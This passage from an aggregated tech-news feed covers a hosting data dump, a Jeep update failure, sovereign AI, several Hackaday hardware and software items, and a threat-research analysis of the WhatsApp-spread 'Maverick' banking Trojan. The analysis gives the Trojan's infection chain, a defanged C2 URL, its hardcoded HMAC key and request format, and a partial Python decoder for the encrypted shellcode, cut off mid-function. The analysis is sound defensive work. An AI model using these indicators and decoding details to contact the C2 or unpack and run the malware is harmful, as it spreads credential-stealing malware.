As often happens in these contexts, the price asked (just $1,000) is inversely proportional to the potential risk for the thousands of companies and professionals who may find themselves exposed.

Red Hot Cyber will continue to monitor the spread of this dump and any correlation with known providers in Italy. For now, it remains yet another warning about how fragile the “upstream” security of those who host thousands of websites every day can be.

The article “Alert: thousands of Italian sites at risk! 526,000 sites and 6,500 DBs for sale on the dark web” originally appeared on Red Hot Cyber.


A software update renders Jeep 4xe vehicles unusable


A software update released last weekend for Jeep 4xe hybrid models caused a serious malfunction: the vehicles stopped working, leaving owners literally stranded. The problem arose after a failed over-the-air update of the uConnect system on 10 October. The update locked up the telematics module, rendering the vehicles unusable.

On the evening of 10 October, reports of widespread failures began to appear on Jeep owners' forums. A customer-service representative going by the name Kori urged users to refrain from installing the update and promised that distribution of the file had already been suspended. For many drivers, however, it was too late: they had already updated the system and could no longer drive their vehicles.

The first victims described their vehicles shutting down suddenly while driving. One owner, an infrastructure engineer at Wells Fargo, said he lost traction at low speed and managed to get home, while others found themselves in a far more dangerous situation: their cars shut off right on the motorway. He remarked that the coding error had clearly not been properly tested and stressed that such malfunctions can be lethal.

Another Jeep owner accepted the update unaware of the problem. That morning, after reading alarming messages in a 4xe owners' group, he checked the vehicle and found that it no longer responded to controls, refused to enter drive mode, and the instrument cluster was flashing several error messages. After contacting the dealership, he had confirmation that the problem was widespread and affected at least 2024 Wrangler 4xe models.

Some users reported having to call a tow truck to get their vehicles repaired. One forum member noted that his dealership received several similar requests within an hour. Others expressed outrage that dealerships were charging for diagnostics despite the manufacturer's clear responsibility.

The day after the incident, Stellantis, Jeep's parent company, released an over-the-air fix that restored vehicle functionality. Owners confirmed that after installing the new file and several restarts, the engine started again and the system stopped generating errors. Still, the incident has raised numerous doubts about internal testing processes and update-release procedures.

Such failures in automotive systems are becoming increasingly common as electronics grow more complex and OTA mechanisms spread. The uConnect update error showed that even a single faulty file can paralyse vehicles.

The article “A software update renders Jeep 4xe vehicles unusable” originally appeared on Red Hot Cyber.


What sovereign AI, if it runs on the servers and algorithms of a US company!


This year OpenAI announced a series of projects with foreign governments to build “sovereign artificial intelligence” systems. According to the company, some of these agreements are being negotiated with US authorities. The aim is to give national leaders greater control over a technology that has the potential to transform their economies.

In recent months, “sovereign AI” has become a buzzword in Washington and Silicon Valley. Supporters consider it essential that systems developed in democratic countries be actively spread globally, especially as Chinese models are increasingly exported.

In its July AI action plan, the Trump administration framed the idea as follows: the spread of American technologies should prevent strategic rivals from making allies dependent on the decisions of “hostile” suppliers.

For OpenAI, moving in this direction means working not only with democracies. The company is collaborating with the United Arab Emirates, where power rests with a federation of monarchies. OpenAI's chief strategy officer, Jason Kwon, says that engaging with non-democratic regimes can push them towards greater openness. Kwon favours inclusion over isolation, and this approach sometimes works and sometimes does not.

Critics point out that similar arguments were made about China twenty years ago. At the time, the United States bet on economic integration as a path to liberalisation. As a result, many American companies profited from trade while Beijing's policies hardened.

The debate has also focused on what constitutes true sovereignty. Some experts hold that without the ability to inspect and, to some extent, control the model, sovereignty is impossible. Clément Delangue, CEO of Hugging Face, says that “there is no sovereignty without open source”. In this area, China has already taken a leading role, with its open-source models rapidly gaining popularity beyond its borders.

The term “sovereign AI” currently covers several architectures. In some projects the state gets partial control over the stack, while in others it has full control over the infrastructure, from hardware to software. The common denominator of all the initiatives is legality. As Tricia Ray of the Atlantic Council's GeoTech Center observes, tying at least part of the infrastructure to geographic borders makes its design, development and deployment subject to national law.

In the United Arab Emirates, a partnership between the United States and OpenAI is building a data-center cluster with a total capacity of 5 GW. Around 200 MW of that capacity is expected to be operational by 2026. The country is also rolling out ChatGPT for government services. However, there is no indication that the government will gain access to the model's internals or the right to modify how it works.

Only a few years ago, the idea of deploying AI infrastructure in authoritarian countries might have sparked protests in Silicon Valley. In 2019, Google employees managed to shut down a censored search project for China. Now, analysts note, the attitude has become more pragmatic. The logic of “operating in a country means obeying its laws” has become significantly normalised, so there is little internal protest around the major LLM initiatives.

Kwon stresses that OpenAI will not delete information at the request of foreign authorities. The company may add local resources and features, but does not plan to “cleanse” the data.

While American companies forge international alliances, Chinese companies are actively distributing open-source models around the world. Alibaba, Tencent and start-ups such as DeepSeek are publishing base models with capabilities comparable to their Western counterparts. Alibaba says Qwen-family software has been downloaded more than 300 million times and that more than 100,000 derivative models have been created from it. Qwen is making significant inroads in Japan thanks to its high-quality local-language support. Last month, researchers in the United Arab Emirates presented a new model based on Qwen2.5.

OpenAI too returned to an open format this spring, releasing its first open-weights models since GPT-2. According to industry sources, the decision was influenced by the enormous popularity of DeepSeek's open-source models earlier this year. Delangue observes that focusing on open source speeds up progress. Companies quickly adopt each other's successful training techniques, which is why, in just five years, Chinese teams have gone from lagging behind to being on par with US teams, taking a leadership position in the open ecosystem. He estimates that China could take the lead in AI as early as next year.

There is also a pragmatic aspect. In a closed environment, the same energy-intensive training cycle is often repeated in parallel by several labs. In an open ecosystem, one center trains and publishes the model, neighbouring centers do not have to spend the same resources, and capacity is distributed more efficiently.

OpenAI believes that sovereign AI is not a choice between “open” and “closed”. Several countries want the best of both worlds. Some tasks are more easily tackled with large-scale commercial models, while others are better built on open-source solutions that can be tested and adapted to local legal and market requirements.

The article “What sovereign AI, if it runs on the servers and algorithms of a US company!” originally appeared on Red Hot Cyber.


How bad can a $0.60 Knockoff ADS1115 ADC be?


Although the saying caveat emptor rings loudly in the mind of anyone buying electronic components, the lure of Very Cheap Stuff is almost impossible to resist. Sure, that $0.60 ADC on LCSC that swears it’s a TI ADS1115 may be a knock-off, since the same part on Digikey is $4 a pop, and that’s when you buy a pack of 1,000. Yet what if it’s a really good knockoff that provides similar performance for a fraction of the price? Cue [James Bowman] letting curiosity get the better of him and ordering a stash of four boards presumably equipped with said cheapo knockoff part, mostly on account of getting all the boards for a mere $2.97.

The goal was of course to subject these four purported ADS1115s to some testing and comparison with the performance listed in the TI datasheet. Tellingly, each of the ADCs on the boards showed different characteristics, notably in the data rate. This is supposed to be within ±10% of the nominal, so 7.2 – 8.8 samples per second in 8 SPS mode, but three boards lagged at 6.5 – 7 SPS and the fourth did an astounding 300 SPS, which would give you pretty noisy results.

Using a calibrated 2.5 V voltage source, the accuracy of the measurements was also checked, which showed them reading 12 mV low. The good news is that a linear correction on the MCU can compensate for this, but it shows that despite these parts being ADS1115 compatible and having features like the PGA working, you’re definitely getting dinged on performance and accuracy.
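
As an added example (not [James Bowman]’s code), here is a host-side version of the checks described above: the data rate against the datasheet’s ±10% band, the error of a reading against a calibrated reference, and the linear correction that would later be applied on the MCU. The PGA full-scale ranges are from the TI ADS1115 datasheet; the timestamps and codes are constructed to mirror the figures quoted in the article.

```python
"""Acceptance checks for a board sold as an ADS1115 (added example).
FSR per PGA gain and the +/-10 % data-rate tolerance follow the TI datasheet;
the timestamps and codes in __main__ are constructed to mirror the article."""
from dataclasses import dataclass
from typing import Sequence

# Full-scale range in volts for each PGA gain; results are 16-bit two's
# complement, so one LSB is FSR / 32768 (125 uV at gain 1).
ADS1115_FSR = {2 / 3: 6.144, 1: 4.096, 2: 2.048, 4: 1.024, 8: 0.512, 16: 0.256}


def code_to_volts(code: int, pga_gain: float = 1) -> float:
    """Convert a raw conversion result to volts for the given PGA gain."""
    if not -32768 <= code <= 32767:
        raise ValueError(f"not a 16-bit signed code: {code}")
    return code * ADS1115_FSR[pga_gain] / 32768


def measured_sps(timestamps: Sequence[float]) -> float:
    """Average samples per second from conversion-complete timestamps (s)."""
    if len(timestamps) < 2 or timestamps[-1] <= timestamps[0]:
        raise ValueError("need at least two increasing timestamps")
    return (len(timestamps) - 1) / (timestamps[-1] - timestamps[0])


def data_rate_in_spec(sps: float, nominal_sps: float, tol: float = 0.10) -> bool:
    """Datasheet spec: actual data rate within +/-10 % of the nominal setting."""
    return nominal_sps * (1 - tol) <= sps <= nominal_sps * (1 + tol)


@dataclass(frozen=True)
class LinearCorrection:
    """reference = gain * measured + offset, cheap enough to apply on the MCU."""
    gain: float
    offset: float

    def apply(self, volts: float) -> float:
        return self.gain * volts + self.offset


def fit_linear_correction(measured: Sequence[float],
                          reference: Sequence[float]) -> LinearCorrection:
    """Least-squares line through (measured, reference) calibration points; two
    points (e.g. a shorted input and a calibrated 2.5 V source) are enough."""
    n = len(measured)
    if n != len(reference) or n < 2:
        raise ValueError("need >= 2 matching calibration points")
    mx, my = sum(measured) / n, sum(reference) / n
    sxx = sum((x - mx) ** 2 for x in measured)
    if sxx == 0:
        raise ValueError("calibration points must span a voltage range")
    sxy = sum((x - mx) * (y - my) for x, y in zip(measured, reference))
    gain = sxy / sxx
    return LinearCorrection(gain=gain, offset=my - gain * mx)


@dataclass(frozen=True)
class BoardReport:
    name: str
    sps: float
    rate_ok: bool
    error_mv: float         # reading minus reference, in millivolts


def evaluate_board(name: str, timestamps: Sequence[float], nominal_sps: float,
                   code_at_ref: int, ref_volts: float,
                   pga_gain: float = 1) -> BoardReport:
    """One pass of the test described in the article: data-rate check plus the
    error of a reading taken with a calibrated reference on the input."""
    sps = measured_sps(timestamps)
    err_mv = (code_to_volts(code_at_ref, pga_gain) - ref_volts) * 1000
    return BoardReport(name, sps, data_rate_in_spec(sps, nominal_sps), err_mv)


if __name__ == "__main__":
    # Constructed traces: 20 conversions evenly spaced at the rates the article
    # quotes, each reading the 2.5 V reference 12 mV low (code 19904 at gain 1).
    for name, rate in {"A": 6.8, "B": 6.9, "C": 7.0, "D": 300.0}.items():
        stamps = [i / rate for i in range(20)]
        r = evaluate_board(name, stamps, 8, code_at_ref=19904, ref_volts=2.5)
        verdict = "ok" if r.rate_ok else "OUT OF SPEC"
        print(f"board {r.name}: {r.sps:6.1f} SPS {verdict}, error {r.error_mv:+.1f} mV")
    fix = fit_linear_correction([-0.012, 1.238, 2.488], [0.0, 1.25, 2.5])
    print(f"correction: gain={fix.gain:.5f} offset={fix.offset * 1000:+.1f} mV")
```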

[James] said that he’s going to run the same tests on an ADS1115 board obtained from Adafruit, which likely will have the genuine part. Either way, if you are eyeing this ADC for your own projects, it pays to consider whether the compromises and potential brokenness of the knockoffs are worth it over coughing up a bit more cash. As they say, caveat emptor.


hackaday.com/2025/10/15/how-ba…


Could This be the Year of Algol?


Ok, you caught us. It certainly isn’t going to be the year of Algol. When you think of “old” programming languages, you usually think of FORTRAN and COBOL. You should also think of LISP. But only a few people will come up with Algol. While not a household name, it was highly influential, and now, GCC is on the verge of supporting it just like it supports other languages besides C and C++ these days.

Why bring an old language up to the forefront? We don’t know, but we still find it interesting. We doubt there’s a bunch of Algol code waiting to be ported, but you never know.

Algol first appeared in 1958 and was the lingua franca of academic computer discussions for decades. It was made to “fix” the problems with Fortran, and its influence is still felt today.

For example, Algol was the origin of “blocks of code,” which Algol set between begin/end pairs. The second version of Algol was where Backus-Naur form, or BNF, originated, something still of interest to language designers today.

Interestingly, the new compiler will do Algol 68, which was the final and not terribly popular version. It was sort of the “New Coke” of early computer languages, with many people asserting that Algol 60 was the last “real Algol.” Algol was known for sometimes using funny characters like ≡ and ⊂, but, like APL, had to adapt to more conventional character sets. Most of the Algol specifications didn’t define I/O, either, so it wasn’t enough to know Algol. You had to know which Algol so you could understand how the I/O worked.

If you want to learn Algol, there’s a tutorial on GitHub (use the compiler online, if you like). While [Niklaus Wirth] didn’t create Algol, he was a major player in some of its later development.

youtube.com/embed/3aMwC24EcJk?…


hackaday.com/2025/10/15/could-…


Attack Turns Mouse into Microphone


As computer hardware gets better and better, most of the benefits are readily apparent to users. Faster processors, less power consumption, and lower cost are the general themes here. But sometimes increased performance comes with some unusual downsides. A research group at the University of California, Irvine found that high-performance mice have such good resolution that they can be used to spy on a user’s speech or other sounds around them.

The mice involved in this theoretical attack need to be in the neighborhood of 20,000 dpi, as well as having a relatively high sampling rate. With this combination it’s possible to sense detail fine enough to resolve speech from the vibrations of the mouse pad. Not only that, but the researchers noted that this also enables motion tracking of people in the immediate vicinity as the vibrations caused by walking can also be decoded. The attack does require a piece of malware to be installed somewhere on the computer, but the group also theorize that this could easily be done since most security suites don’t think of mouse input data as particularly valuable or vulnerable.

Even with the data from the mouse, an attacker needs a sophisticated software suite to decode and filter the data and extract sounds, and the research team could only recover around 60% of the audio under the best conditions. The full paper is available here as well. That being said, mice will only get better from here, so this is certainly something to keep an eye on. Mice aren’t the only peripherals with roundabout attacks like this, either.

Thanks to [Stephen] for the tip!

youtube.com/embed/CY7Z37Ul8aQ?…


hackaday.com/2025/10/15/attack…


Printing an Air-Powered Integrated Circuit for Squishy Robots


There’s no rule that says that logic circuits must always use electrically conductive materials, which is why you can use water, air or even purely mechanical means to implement logic circuits. When it comes to [soiboi soft]’s squishy robots, it thus makes sense to turn the typical semiconductor control circuitry into an air-powered version as much as possible.

We previously featured the soft and squishy salamander robot that [soiboi] created using pneumatic muscles. While rather agile, it still has to drag a whole umbilical of pneumatic tubes along, with one tube per function. Most of the research is on microfluidics, but fortunately air is just a fluid that’s heavily challenged in the density department, allowing the designs to be adapted to create structures like gates and resistors.
A transistor or valve using a silicone membrane. (Credit: soiboi soft, YouTube)
Logically, a voltage potential or a pressure differential isn’t so different, and can be used in a similar way. A transistor for example is akin to the vacuum tube, which in British English is called a valve for good reason. Through creative use of a flexible silicone membrane and rigid channels, pulling a vacuum in the ‘gate’ channel allows flow through the other two channels.

Similarly, a ‘resistor’ is simply a narrowing of a channel, thus resisting flow. The main difference compared to the microfluidics versions is everything is a much larger scale. This does make it printable on a standard FDM printer, which is a major benefit.

Quantifying these pneumatic resistors took a bit of work, using a pressure sensor to determine their impact, but after that the first pneumatic logic circuits could be designed. The resistors are useful here as pull-downs, to ensure that any charge (air) is removed, while not impeding activation.

The design, as shown in the top image, is a 5-stage ring oscillator that provides locomotion to a set of five pneumatic muscles. As demonstrated at the end of video, this design allows for the entire walking motion to be powered using a single input of compressed air, not unlike the semiconductor equivalent running off a battery.

While the somewhat bulky nature of pneumatic logic prevents it from implementing very complex logic, using it for implementing something as predictable as a walking pattern as demonstrated seems like an ideal use case. When it comes to making these squishy robots stand-alone, it likely can reduce the overall bulk of the package, not to mention the power usage. We are looking forward to how [soiboi]’s squishy robots develop and integrate these pneumatic circuits.

youtube.com/embed/QJdBp5dGrww?…


hackaday.com/2025/10/15/printi…


FLOSS Weekly Episode 851: Buckets of Money


This week Jonathan talks to James Cole about Firefly III, the personal finance manager! This one itches James’ own itch, but brings great visualization and management tools for your personal finances!


youtube.com/embed/IH4aEnsl3eU?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/10/15/floss-…


2025 Hackaday Supercon: Crafting the Final Frontier Keynote Event


In the history of entertainment, few properties have made the sort of indelible mark on popular culture as Star Trek has. In 950 episodes across the twelve television series that have carried the name, the franchise has made a spectacle not of explosions and machismo, but of competent professionals working together to solve complex problems. In the world of Star Trek, the coolest people in the room are the scientists, engineers, physicists, and doctors — is it any wonder so many in the sciences credit the show for putting them on their career path?

Hardware hacker, maker, and Trekkie Andrew [MakeItHackin] will lead the panel.

To celebrate the impact of Star Trek, we’re proud to announce our keynote event for the 2025 Hackaday Supercon: Crafting the Final Frontier. This round-table discussion led by Andrew [MakeItHackin] will bring together some of the artists that have helped cultivate the look and feel of the final frontier since Star Trek: The Next Generation and all the way into the modern era with Star Trek: Picard.

While the art direction of the original Star Trek series from 1966 was remarkably ahead of its time, these are some of the key individuals who were brought in to refine those early rough-hewn ideas into cultural touchstones. Their work ended up becoming more than simple entertainment, and ultimately helped inspire some of the real-world technology we use on a daily basis. The iconic LCARS computer interface predicted the rise of the touch screen, while it’s impossible to look at props such as the PADD and Tricorder and not see the parallels with modern tablets and smartphones.

The following Star Trek veterans are set to join us at Supercon 2025:

Michael Okuda

Michael Okuda invented the iconic “LCARS” graphic style for Star Trek. He supervised graphics on four Star Trek series and six Trek movies. His work has earned him three primetime Emmy nominations and the NASA Exceptional Public Service medal.

Denise Okuda

Denise Okuda was video playback supervisor on Star Trek: Deep Space Nine and other Trek productions. She is coauthor of the Star Trek Encyclopedia and Chronology and recipient of the Art Directors Guild’s Lifetime Achievement award.

Rick Sternbach

Rick Sternbach is a Hugo and Emmy award-winning space and science fiction artist. His clients include NASA, Smithsonian, Analog and many others. With the rebirth of Star Trek, beginning with The Next Generation, Rick created new spacecraft, tricorders, phasers, and hundreds of other props and set pieces.

Liz Kloczkowski

Liz Kloczkowski is an art director and author of “Resurrecting the Enterprise-D”, renowned for her contributions to Star Trek: Picard. She played a pivotal role in designing Picard’s iconic sets, including the Eleos 12, the Titan-A’s sickbay, transporter room, nacelle room, environmental control room, crew quarters, and a faithful recreation of the Enterprise-D bridge.

Bear Burge

Bear Burge has over 40 years of experience in the television and movie industry as a professional prop fabricator, model maker, and machinist. He has created, fabricated, and designed iconic props for Star Trek, including Picard’s Ressikan Flute, Geordi’s VISOR, and Worf’s baldric.

Michael W. Moore

Michael W. Moore has worked in the entertainment industry for over 40 years, specializing in prop fabrication and product development. Michael worked on multiple blockbusters including the Star Trek franchise and The Hobbit trilogy, as well as cult classics such as Beetlejuice, Gremlins 2, and Re-Animator.

Beaming Up October 31st


We’re just a few weeks away from the start of Supercon 2025. If you’re interested in checking out this stellar (no pun intended) panel, or any of the other fascinating talks and workshops we’ve already announced, there’s still time to get tickets.

But don’t wait too long. Something tells us that the rest of those tickets will get snapped up quickly once we finally reveal this year’s badge, which will be coming very soon.


hackaday.com/2025/10/15/2025-h…


Keep That Engine Running, With a Gassifier


Every now and then in histories of the 20th century’s earlier years, you will see pictures of cars and commercial vehicles equipped with bulky drums, contraptions to make their fuel from waste wood. These are portable gas generators known as gasifiers, and to show how they work there’s [Greenhill Forge] with a build video.
A gasifier on a vintage tractor. Per Larssons Museum, CC BY 2.5.
When you burn a piece of wood, you expect to see flame. But what you are looking at in that flame are the gaseous products of the wood breaking down under the heat of combustion. The gasifier carefully regulates a burn to avoid that final flame, with the flammable gasses instead being drawn off for use as fuel.

The chemistry is straightforward enough, with exothermic combustion producing heat, water vapour, and carbon dioxide, before a further endothermic reduction stage produces carbon monoxide and hydrogen. He’s running his system from charcoal, which is close to pure carbon, presumably to avoid dealing with tar, and at this stage he’s not adding any steam, so we’re a little mystified as to where the hydrogen comes from unless there is enough water vapour in the air.

His retort is fabricated from sheet steel, and is followed by a cyclone and a filter drum to remove particulates from the gas. It relies on a forced air draft from a fan or a small internal combustion engine, and we’re surprised both by how quickly it ignites and by how relatively low a temperature the output gas settles at. The engine runs with a surprisingly simple gas mixer in place of a carburetor, and seems to be quite smooth in operation.

This is one of those devices that has fascinated us for a long time, and we’re grateful for the chance to see it up close. The video is below the break, and we’re promised a series of follow-ups as the design is refined.

youtube.com/embed/nXEDKRbiJe4?…


hackaday.com/2025/10/15/keep-t…


Rubik’s WOWCube: What Really Makes a Toy?


If there ever was a toy that enjoys universal appeal and recognition, the humble Rubik’s Cube is definitely on the list. Invented in 1974 by sculptor and professor of architecture Ernő Rubik, originally under the name Magic Cube, it features a three-by-three grid of colored surfaces on each face and an internal mechanism that allows each of these individual sections of a face to be moved to any other face. This makes the goal of returning each face to its original single color into a challenge, one which has both intrigued and vexed many generations over the decades. Maybe you’ve seen one?

Although there have been some variations of the basic 3×3 grid cube design over the years, none have been as controversial as the recently introduced WOWCube. Not only does this feature a measly 2×2 grid on each face, each part of the grid is also a display that is intended to be used alongside an internal processor and motion sensors for digital games. After spending many years in development, the Rubik’s WOWCube recently went up for sale at $299, raising many questions about what market it’s really targeting.

Is the WOWCube a ‘real’ Rubik’s Cube, and what makes something into a memorable toy and what into a mere novelty gadget that is forgotten by the next year like a plague of fidget spinners?

The Cube’s Genius

Rubik’s Cube components with the nylon core visible. (Credit: Encik Tekateki)
Originally created as a 3D visualization aid for Rubik’s students, the key to the Cube is a sphere. Specifically, the rotation occurs around said internal sphere, with the outer elements interlocked in such a way that they allow for free movement along certain planes. It is this simple design that was turned into a toy by the 1980s, with its popularity surging and never really fading.

There are a few definitions of a ‘toy’, which basically all come down to ‘an object to play with’, meaning something that provides pleasure through the act of interacting with it, whether that’s in the innocent sense of a child’s playtime, or the mind-in-gutter adult sense. These objects are thus effectively without real purpose other than to provide entertainment and potentially inflict basic skills on a developing mind.

Although this may seem like a clear-cut distinction, there is a major grey zone, inside of which we find things like ‘educational toys’ and games like chess. These are toys which are explicitly designed to provide a reward only after a puzzle is solved, often requiring various levels of mental exertion.

It’s hard to argue that a Rubik’s Cube isn’t an educational toy, especially considering its original purpose within the education system. After shuffling the faces of the cube, the goal is to somehow move the individual blocks of color back to their fellow colors on a singular face. This is a process that can be done through a variety of methods, the easiest of which is to recognize the patterns that are formed by the colors.

Generally, solving a Rubik’s Cube is done algorithmically, using visual recognition of patterns and applying the appropriate response. While a casual ‘Cuber’ can solve a standard 3×3 cube in less than half an hour using the basic layer-by-layer algorithm, so-called speedcubers can knock this down to a few seconds by applying far more complicated algorithms. As of May 2025 the world record for fastest single solve stands at 3.05 seconds, achieved by Xuanyi Geng.

In this regard, one can easily put Rubik’s Cube in the same general ‘toy’ category as games like chess, go, and shogi. Although the Cube isn’t by itself a multiplayer game, it also clearly invites competition and a social atmosphere in which to better oneself at the game.

Does It WOW?


With the Cube so firmly established in the global community’s psyche and the multi-colored ‘toy’ a symbol of why paying attention during math classes can absolutely pay off later in life, this brings us to the WOWCube. Looking at the official website for the item, one can’t help but feel less than inspired.
Would you rather play this than solve a Rubik’s Cube? (Credit: WOWCube)
Backing up a bit, the device itself is already a major departure from the Cube. Although the WOWCube’s price tag at $299 is absolutely worthy of a ‘Wow’, the 2×2 configuration is decidedly underwhelming. Yes, it rotates like a Cube, and you could use it like a regular 2×2 Cube if that is your thing and you hate a challenge, but the general vibe is that you’re supposed to be playing the equivalent of Flash or phone games on the screens, in addition to using it like a geometrically-challenged smartphone to display statuses and notifications.

For these applications you have the use of a total of 24 1.4″ IPS LC displays, each with a 240 x 240 resolution. Due to the 2×2 configuration, you have eight blocks that can be moved around, each with its own built-in processor, battery, speaker and 6-axis IMU sensor for gyroscope and accelerometer functionality. These blocks communicate with each other using a magnetic system, and after up to five hours of play time you have to recharge it on the special charger.

Currently you can only pre-order the special Rubik’s WOWCube, with delivery expected ‘by Christmas 2025’. You can however get a good idea of what the experience will be like from videos like the 2022 review video of a pre-production unit by MetalJesusRocks, who also helpfully did a teardown while reconnecting the battery in one block after it disconnected during use.
The 2022 preproduction WOWCube with a block removed. (Credit: MetalJesusRocks, YouTube)
The internals of a 2022-era WOWCube block. (Credit: MetalJesusRocks, YouTube)

Although this happened with a preproduction unit, it provides some indications regarding the expected lifespan of a WOWCube, as these devices are likely to experience constant mechanical forces being applied to it. With no touchscreen, you have to sometimes rather violently tap the cube or shake it to register user input, which will likely do wonders for long-term reliability.

In the earlier referenced pre-production review, the conclusion was – especially after having a group of random folk try it out – that although definitely an interesting device, it’s too expensive and too confused about who or what it is targeting. This is also the vibe in a brief production unit review by major gadget YouTube channel Mrwhosetheboss, whose ‘Overkill Toys’ video spent a few minutes fiddling with a 2023-era, $599 Black Edition WOWCube before giving it the ‘impressive, but why’ thumbs down.

This also reveals an interesting aspect: the WOWCube was never designed by the Rubik’s Cube company for Rubik’s Cube users; rather, it is the Cubios Inc. company that created the WOWCube Entertainment System. Spin Master, the company that owns the Rubik’s brand name, has decided to release this $299 version with official Rubik’s Cube branding. Basically, you could have bought your own WOWCube all along for the past few years.

More Of A MehCube


Considering the overwhelming chorus of crickets that greeted the release of earlier versions of the WOWCube Entertainment System, it seems unlikely that slapping Rubik’s Cube branding on a WOWCube will do much to change the outcome. Although Cube enthusiasts don’t mind shelling out a few hundred bucks for a magnetically levitated, fairy dust-lubricated Cube to gain that 0.1 second advantage in competitive solving, this is totally distinct from this WOWCube product.

While absolutely impressive from a technological perspective, and likely a fun toy for (adult) children who can use it to keep themselves occupied with a range of potentially educational games, the price tag and potentially fragile nature of the device rather sours the deal. You do not want to give the WOWCube to a young child who may drop it harder than a $1,400 iPad, while giving Junior a dodgy $5 Rubik’s Cube clone to develop their algorithmic skills with is far less of a concern.

So if Rubik’s Cube fans don’t seem interested in this device, and the average person might be interested, but only if it was less than $100, it would seem that the WOWCube is condemned to be just another overpriced gadget, and not some kind of ‘digital re-imagining’ of the veritable Cube, as much as the marketing makes you want to sign up for a WOWClub subscription and obligatory ‘AI’ features.


hackaday.com/2025/10/15/rubiks…


Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution


A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It targets mainly Brazilians and uses Portuguese-named URLs. To evade detection, the command-and-control (C2) server verifies each download to ensure it originates from the malware itself.
The whole infection chain is complex and fully fileless, and by the end, it will deliver a new banking Trojan named Maverick, which contains many code overlaps with Coyote. In this blog post, we detail the entire infection chain, encryption algorithm, and its targets, as well as discuss the similarities with known threats.

Key findings:


  • A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named “Maverick” through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform.
  • Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts.
  • The new Trojan features code similarities with another Brazilian banking Trojan called Coyote; however, we consider Maverick to be a new threat.
  • The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed.
  • The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay. It aims to capture banking credentials.
  • Once active, the new Trojan will monitor the victims’ access to 26 Brazilian bank websites, 6 cryptocurrency exchange websites, and 1 payment platform.
  • All infections are modular and performed in memory, with minimal disk activity, using PowerShell, .NET, and encrypted shellcode generated with Donut.
  • The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development.
  • Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil.


Initial infection vector


The infection chain works according to the diagram below:

The infection begins when the victim receives a malicious .LNK file inside a ZIP archive via a WhatsApp message. The filename can be generic, or it can pretend to be from a bank:

The message said: “Visualization allowed only on computers. In case you’re using the Chrome browser, choose ‘keep file’ because it’s a zipped file”.

The LNK is encoded to execute cmd.exe with the following arguments:

The decoded commands point to the execution of a PowerShell script:

The command contacts the C2 to download another PowerShell script. Note that the C2 also validates the “User-Agent” of the HTTP request to ensure that it comes from the PowerShell command; without the correct “User-Agent”, the C2 returns HTTP 401.

The entry script decodes an embedded .NET file, entirely in memory. Each byte is decoded by dividing it by a specific value; in the script above, the value is “174”. The decoded PE file is then loaded as a .NET assembly inside the PowerShell process, making the entire infection fileless, with nothing written to disk.

Initial .NET loader


The initial .NET loader is heavily obfuscated using Control Flow Flattening and indirect function calls, storing them in a large vector of functions and calling them from there. In addition to obfuscation, it also uses random method and variable names to hinder analysis. Nevertheless, after our analysis, we were able to reconstruct (to a certain extent) its main flow, which consists of downloading and decrypting two payloads.

The obfuscation does not hide the method’s variable names, which means it is possible to reconstruct the function easily if the same function is reused elsewhere. Most of the functions used in this initial stage are the same ones used in the final stage of the banking Trojan, which is not obfuscated. The sole purpose of this stage is to download two encrypted shellcodes from the C2. To request them, an API exposed by the C2 on the “/api/v1/” routes will be used. The requested URL is as follows:

  • hxxps://sorvetenopote.com/api/v1/3d045ada0df942c983635e

To communicate with this API, it sends an API key in an HTTP request header named “X-Request-Headers”. The API key is computed locally using the following construction:

  • “Base64(HMAC256(key, data))”

An HMAC authenticates a message under a secret key; here the threat actor uses it to derive the “API Key” with the HMAC key “MaverickZapBot2025SecretKey12345”. The signed data sent to the C2 is “3d045ada0df942c983635e|1759847631|MaverickBot”, with the segments separated by “|”. The first segment identifies the requested resource (the first encrypted shellcode), the second is the infection’s timestamp, and the last, “MaverickBot”, suggests that this C2 protocol may be reused in future campaigns with different variants of this threat. The check prevents generic tools like “wget” or HTTP downloaders from fetching this stage; only a client that knows the key can. Since the key is hardcoded in the loader, though, an analyst who has the sample can compute the same header.

The response is an encrypted Donut-based loader shellcode. From here the initial loader follows two execution paths: one leads to another loader for the WhatsApp infector, the other to the final payload, which we call “MaverickBanker”. Each Donut shellcode embeds a .NET executable. The shellcode is encrypted with an XOR scheme whose key is stored in the last bytes of the binary returned by the C2. The algorithm to decrypt the shellcode is as follows:

  • Extract the last 4 bytes (int32) from the binary file; this indicates the size of the encryption key.
  • Walk backwards until you reach the beginning of the encryption key (file size – 4 – key_size).
  • Get the XOR key.
  • Apply the XOR to the entire file using the obtained key.
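An added Python decoder for that trailer layout (written for this page, not taken from the loader): it reads the trailing int32 key length, slices the key out from in front of it, and applies repeating-key XOR to the payload that precedes the key. Two readings of the steps above are assumptions of mine: the int32 is little-endian (what .NET’s BitConverter produces on x86), and “the entire file” means the payload portion rather than the key bytes themselves. The sample blob is constructed inside the script.

```python
import struct


def split_trailer(blob: bytes) -> tuple[bytes, bytes]:
    """Parse the layout described in the report:
       [ encrypted payload ][ key (key_size bytes) ][ key_size as int32 ]
    Returns (payload, key)."""
    if len(blob) < 4:
        raise ValueError("blob too short to carry a key-size trailer")
    # Assumption: little-endian signed int32 for the key size.
    (key_size,) = struct.unpack("<i", blob[-4:])
    if key_size <= 0 or key_size > len(blob) - 4:
        raise ValueError(f"implausible key size {key_size}")
    key_start = len(blob) - 4 - key_size          # file size - 4 - key_size
    return blob[:key_start], blob[key_start:len(blob) - 4]


def xor_with_key(data: bytes, key: bytes) -> bytes:
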